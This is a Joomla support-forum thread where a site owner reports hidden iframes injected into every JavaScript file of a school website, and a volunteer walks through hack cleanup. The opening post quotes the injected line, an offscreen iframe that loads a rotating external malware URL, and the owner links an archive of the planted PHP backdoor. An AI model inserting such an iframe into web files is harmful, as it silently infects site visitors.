auto malware iframe in Joomla 2.5

[radat]

Hi! Two days ago, in the code of all .js automatically registers the following code:

Code: Select all

;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://zwdqnikmq.wikaba.com/e6fcc0c51bb0bc8b3a.PGgnVmzaJXoj?default" height="110" width="110"></iframe>');

link in this code is always changing to another link when i restart my site in browser.

Site http://312school-spb.ru

I install a clean joomla (downloaded from this site - http://www.joomla.org/download.html) on the test domain and this iframe written in test joomla after several refresh site in a browser: http://test.312school-spb.ru

Site http://312school-spb.ru is not working now because that creates an iframe redirect. Test site http://test.312school-spb.ru is working but you can see that the iframe is also trying to redirect.

The server has been verified Antivirus, but no problems were found.

Please help solve the problem.

[Webdongle]

Full instructions on how to deal with a hacked site can be found at http://forum.joomla.org/viewtopic.php?f=621&t=582854

[radat]

Full instructions on how to deal with a hacked site can be found at http://forum.joomla.org/viewtopic.php?f=621&t=582854

Webdongle, thank`s for your reply.

Problem solved. Briefly describe:

Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php

If interested here is the deleted file in archive: https://www.box.com/s/mp0pvfery30gnbo9bz

When was deleted this file ( .csdizx.php ) i was deleted badcode in all javascripts files and after refresh the site in the browser code no longer appears.

Now the site is working properly: http://312school-spb.ru

There remains the question of how this file ( .csdizx.php ) can load on a site?

Here is the info script FPA: https://www.box.com/s/uq2whdl7c3af9tvkbxvh

[Webdongle]

...
Problem solved. ...
Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php
...

Unless you deleted all the folders/files on the server then you have not completely eradicated the hack. Also you have not posted the results of the FPA which suggest you have not followed the advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 . Your site (even in the unlikely that you managed to locate all the hack files) will still be vulnerable for attack by hackers.

[radat]

...
Problem solved. ...
Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php
...

Also you have not posted the results of the FPA .....

Thanks for the help, Webdongle. Here is...

auto malware iframe in Joomla 2.5

The server has been verified Antivirus, but no problems were found.

Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php

When was deleted this file ( .csdizx.php ) i was deleted badcode in all javascripts files

Joomla! Instance :: Joomla! 2.5.8-Stable (Ember) 8-November-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: radatus (uid: 1/gid: 1) | Group: radatus (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 1 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 1 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: N/A | Unicode Slugs: N/A | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-5-amd64 | Technology: x86_64 | Web Server: Apache/2.2.16 (Debian) | Encoding: gzip, deflate | Doc Root: /var/www/radatus/data/www/312school-spb.ru | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3-7+squeeze14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 22527 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 200M | Max. POST Size: 200M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

MySQL Configuration :: Version: 5.1.61-0+squeeze1 (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 9.31 MiB | #of Tables: 167

PHP Extensions :: Core (5.3.3-7+squeeze14) | date (5.3.3-7+squeeze14) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | standard (5.3.3-7+squeeze14) | posix () | Reflection ($Revision: 300393 $) | SPL (0.2) | shmop () | SimpleXML (0.1) | soap () | sockets () | Phar (2.0.1) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | ADOdb () | curl () | ffmpeg (0.6.0-svn) | gd () | gmp () | idn () | imagick (3.0.0RC1) | imap () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | pspell () | recode () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | suhosin (0.9.32.1) | tidy (2.0) | uuid () | xmlrpc (0.51) | xsl (0.1) | mhash () | ionCube Loader () | Zend Guard Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No

Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) ::

Components :: SITE :: com_mailto (2.5.0) | Default (1.0.0) | com_wrapper (2.5.0) | Extended Pro Template (2.2.5) | Default (2.2.0) | Default (2.2.0) |
Components :: ADMIN :: com_search (2.5.0) | com_phocagallery (3.2.2) | com_finder (2.5.0) | com_content (2.5.0) | com_admin (2.5.0) | com_joomlaupdate (2.5.0) | com_weblinks (2.5.0) | com_modules (2.5.0) | com_users (2.5.0) | com_easybookreloaded (4.0) | com_languages (2.5.0) | com_messages (2.5.0) | SMFAQ (1.6.0) | com_login (2.5.0) | com_templates (2.5.0) | com_cpanel (2.5.0) | com_redirect (2.5.0) | com_media (2.5.0) | COM_GCALENDAR (2.3.0) | com_cache (2.5.0) | com_newsfeeds (2.5.0) | Widgetkit (1.0.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_installer (2.5.0) | com_plugins (2.5.0) | JomSocial (2.2.5) | com_menus (2.5.0) | com_config (2.5.0) | com_banners (2.5.0) | com_kunena (1.7.1) | com_kunena (1.7.2) | Kunena language pack (@kunenaversio) | plg_system_kunena (-) | plg_system_kunena (-) | plg_system_kunena (1.7.1) | System - Kunena (1.7.1) | com_xmap (2.0) |

Modules :: SITE :: mod_articles_categories (2.5.0) | mod_finder (2.5.0) | mod_weather_gk4 (GK4 1.6) | mod_articles_archive (2.5.0) | Image Show GK4 (GK4 1.13) | Расширенный мод� (1.1) | mod_weblinks (2.5.0) | mod_articles_popular (2.5.0) | Magic Simple Video Player (1.0.2) | Widgetkit (1.0.0) | MOD_GCALENDAR (2.3.0) | MOD_JLVKGROUP (2.3) | mod_custom (2.5.0) | mod_articles_news (2.5.0) | mod_whosonline (2.5.0) | mod_feed (2.5.0) | mod_random_image (2.5.0) | MOD_GCALENDAR_NEXT (2.3.0) | mod_breadcrumbs (2.5.0) | Widgetkit Twitter (1.0.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_wrapper (2.5.0) | mod_news_pro_gk4 (GK4 2.3) | mod_articles_category (2.5.0) | mod_menu (2.5.0) | mod_footer (2.5.0) | JA Facebook Like Box Module (2.5.2) | Hello Me (2.2.4) | MOD_GCALENDAR_UPCOMING (2.3.0) | mod_search (2.5.0) | JA Twitter Module (2.5.2) | mod_users_latest (2.5.0) | mod_articles_latest (2.5.0) | mod_languages (2.5.0) | mod_banners (2.5.0) | Kunena Latest (1.7.0) | mod_related_items (2.5.0) | mod_login (2.5.0) |
Modules :: ADMIN :: mod_status (2.5.0) | mod_custom (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) | mod_feed (2.5.0) | mod_unread (1.6.0) | mod_popular (2.5.0) | mod_title (2.5.0) | mod_logged (2.5.0) | mod_latest (2.5.0) | mod_submenu (2.5.0) | mod_menu (2.5.0) | mod_online (1.6.0) | mod_quickicon (2.5.0) | mod_multilangstatus (2.5.0) | mod_login (2.5.0) |

Plugins :: SITE :: plg_extension_joomla (2.5.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | User - Jomsocial User (1.8.1) | plg_user_profile (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_joomla (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_geshi (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_vote (2.5.0) | plg_content_finder (2.5.0) | Content - Widgetkit (1.0.0) | plg_content_emailcloak (2.5.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.4.1) | PLG_EDITORS-XTD_MODULESANYWHER (1.12.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_article (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_categories (2.5.0) | My Kunena Forum Posts (1.7.0) | Стена сообщений (2.0.0) | My Kunena Forum Menu (1.7.0) | plg_search_gcalendar (2.3.0) | plg_search_contacts (2.5.0) | plg_search_weblinks (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_content (2.5.0) | plg_search_categories (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_gmail (2.5.0) | plg_authentication_ldap (2.5.0) | plg_system_redirect (2.5.0) | plg_system_jch_optimize (2.0.2) | System - Widgetkit Joomla (1.0.0) | PLG_SYSTEM_MODULESANYWHERE (1.12.0) | plg_system_languagecode (2.5.0) | plg_system_logout (2.5.0) | System - Widgetkit (1.0.0) | plg_system_p3p (2.5.0) | plg_system_sef (2.5.0) | PLG_SYSTEM_NNFRAMEWORK (11.9.1) | System - Jomsocial Facebook Co (1.0) | Jomsocial Update (1.5) | plg_system_remember (2.5.0) | plg_system_banip (2.5.4) | backendtoken (1.2) | Google Maps (2.131c) | plg_system_debug (2.5.0) | plg_system_cache (2.5.0) | Azrul System Mambot For Joomla (3.3) | plg_system_log (2.5.0) | System - Zend Lib (1.11.4) | plg_system_languagefilter (2.5.0) | plg_system_kunena (1.7.1) | plg_system_highlight (2.5.0) | System - KeyCAPTCHA (4.1.3) |

Templates :: SITE :: beez_20 (2.5.0) | yoo_nano2 (1.0.1) | beez5 (2.5.0) | atomic (2.5.0) |
Templates :: ADMIN :: hathor (2.5.0) | bluestork (2.5.0) |

[Webdongle]

Have you done everything else on the list
Delete all files
check computers for malware
change passwords
check if extensions are on the Vulnerable Extensions List
check all extensions are up to date ?


What is the 'Стена сообщений' plugin ?
Where did you download it from ?

Where did you download your custom Template from ?


The hack found a hole in your security somewhere ... you need to delete all your files to make sure you have deleted all the hack files. And you need to do everything else on http://forum.joomla.org/viewtopic.php?f=621&t=582854 to make sure you close that hole(and any others that you may have.

Once you have irradiated the hack files by deleting all files and closed the security hole(s) ... only then have you fixed the site.

If you close the hole(s) without deleting all files then the hack will open up more holes. It is important that you do everything on http://forum.joomla.org/viewtopic.php?f=621&t=582854 in the order it says the instructions.

[radat]

Have you done everything else on the list....

Delete all files - what files i must delete ? All site files ?

check computers for malware - yes. Checked by NOD32 5.2.9.12 ОК!

change passwords - yes. Change root pass server, root pass MySQL, pass ftp, pass and user MySQL school312-spb.ru

check if extensions are on the Vulnerable Extensions List - yes.

check all extensions are up to date - not all. Kunena 1.7.1 and JomSocial 2.2.5

What is the 'Стена сообщений' plugin ? - this is JomSocial plugin community walls. Download it from off. site in my account here: http://www.jomsocial.com/component/account/ and translate it.

Where did you download your custom Template from ? - download it from my account in YOOTheme here: http://www.yootheme.com/account/account

[Webdongle]

...
Delete all files - what files i must delete ? All site files ?
...

Yes all site files because ... unless you are an expert and know how to use a scanner ... you can not be certain you have found all the hack files or if genuine files have been compromised.

...
change passwords - yes. Change root pass server, root pass MySQL, pass ftp, pass and user MySQL school312-spb.ru
...

If you changed the passwords before deleting all the files then there could be a hacked file still on the server that steals your new passwords(or allows hackers to access so as to find your new passwords).

...

check if extensions are on the Vulnerable Extensions List - yes.

check all extensions are up to date - not all. Kunena 1.7.1 and JomSocial 2.2.5
...

Then you saw http://docs.joomla.org/Vulnerable_Exten ... ist#Kunena saying old versions of Kunena are vulnarable.

[radat]

Yes all site files because ...

If I delete all the files of the site then the site will not work! In essence you are offering to rebuild the site. Unfortunately this is not possible in the near future.

If you changed the passwords before deleting all the files

Malware in site can not just pick up root passwords. But the database password of the site you're right, i should be changed after the removal of all files and rebuild the site.

...saying old versions of Kunena are vulnarable.

So what to do. Must be upgraded...

Webdongle thank you for your support. Now I need to work harder on the site.

Thank you. Have a nice day!

Regards, Anton.

[Webdongle]

...
If I delete all the files of the site then the site will not work! ...

If you read the instructions on http://forum.joomla.org/viewtopic.php?f=621&t=582854 it will tell you how to replace the files with fresh ones.

...
Malware in site can not just pick up root passwords. But the database password of the site you're right, i should be changed after the removal of all files and rebuild the site.....

Sorry but you are wrong ... hacked files on your site can allow the hacker full access to your server. The hacker can add.change/move any folder/file on your server that you can using ftp. And that allows the hacker not only to read the configuration.php file and thus have full access to your database ... it allows the hacker to put files on your server.

If you still have infected files on your site the hacker can place files on your site that infect visiting Browsers and thus the PC's that the Browsers are on. And the hacker can put files on your site that can allow access to server settings.

...
So what to do. Must be upgraded...
...

Please refer to http://forum.joomla.org/viewtopic.php?f=621&t=582854

... thank you for your support. Now I need to work harder on the site. ....

The advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 was compiled by many people and each step has a reason. Fail to complete each step and you risk working even harder to do it all over again. And you risk having your database and server compromised. Not to mention having your site blacklisted by Google and other search engines.

[radat]

The advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 was compiled by many people and each step has a reason. Fail to complete each step and you risk working even harder to do it all over again. And you risk having your database and server compromised. Not to mention having your site blacklisted by Google and other search engines.

I understand. Thanks for the help! Good luck!